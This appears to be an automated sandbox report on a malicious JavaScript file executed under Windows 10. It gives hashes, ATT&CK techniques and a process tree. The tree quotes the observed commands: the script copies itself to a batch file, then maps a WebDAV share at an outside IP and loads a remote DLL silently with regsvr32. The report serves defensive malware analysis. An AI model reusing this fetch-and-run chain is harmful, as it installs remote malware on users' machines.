0ca785b11cb44c43be9ef5b921c85e15d450c4caf86ca2ac9bec1fc8f571d441

Analysis

max time kernel
149s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20240704-en
resource tags

arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
submitted
08-07-2024 04:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1850166781191324920.js
Size

5KB
MD5

33301c9fd5a47289e0eff7062eb98c94
SHA1

b03d439fcf85bf9d0f0af3ae04373c5c96c69e3a
SHA256

3c543b9ebb57e8f30bd562e236bc2d2eea1fc2cc49e90842134de289102fd35c
SHA512

67141920168ad265f7ad55d1a5795a6edfcdb7cb91bb21c4a8b484c9cc47a85e990157792b977282800914b50f3581d6207fd69292928d5e62dc51f8e68123a0
SSDEEP

96:yfbvUIOO8hX7IOO8h8GoM/prtxJcqSGZTt6LWhJPNvhzALk8oOkP8o9:yPOO8SOO82m/Jtx7SGvtlSkP5

Score

7^/10

execution

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2753856825-3907105642-1818461144-1000\Control Panel\International\Geo\Nation	wscript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs net.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2652 wrote to memory of 4140	2652	wscript.exe	83
PID 2652 wrote to memory of 4140	2652	wscript.exe	83
PID 4140 wrote to memory of 1104	4140	cmd.exe	87
PID 4140 wrote to memory of 1104	4140	cmd.exe	87
PID 4140 wrote to memory of 4780	4140	cmd.exe	88
PID 4140 wrote to memory of 4780	4140	cmd.exe	88

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\1850166781191324920.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2652
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\1850166781191324920.js" "C:\Users\Admin\\fwauam.bat" && "C:\Users\Admin\\fwauam.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4140
- - C:\Windows\system32\net.exe
    net use \\45.9.74.13@8888\DavWWWRoot\
    3⤵
    PID:1104
- - C:\Windows\system32\regsvr32.exe
    regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\895.dll
    3⤵
    PID:4780

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\fwauam.bat

Filesize
5KB

MD5
33301c9fd5a47289e0eff7062eb98c94

SHA1
b03d439fcf85bf9d0f0af3ae04373c5c96c69e3a

SHA256
3c543b9ebb57e8f30bd562e236bc2d2eea1fc2cc49e90842134de289102fd35c

SHA512
67141920168ad265f7ad55d1a5795a6edfcdb7cb91bb21c4a8b484c9cc47a85e990157792b977282800914b50f3581d6207fd69292928d5e62dc51f8e68123a0

Download Submit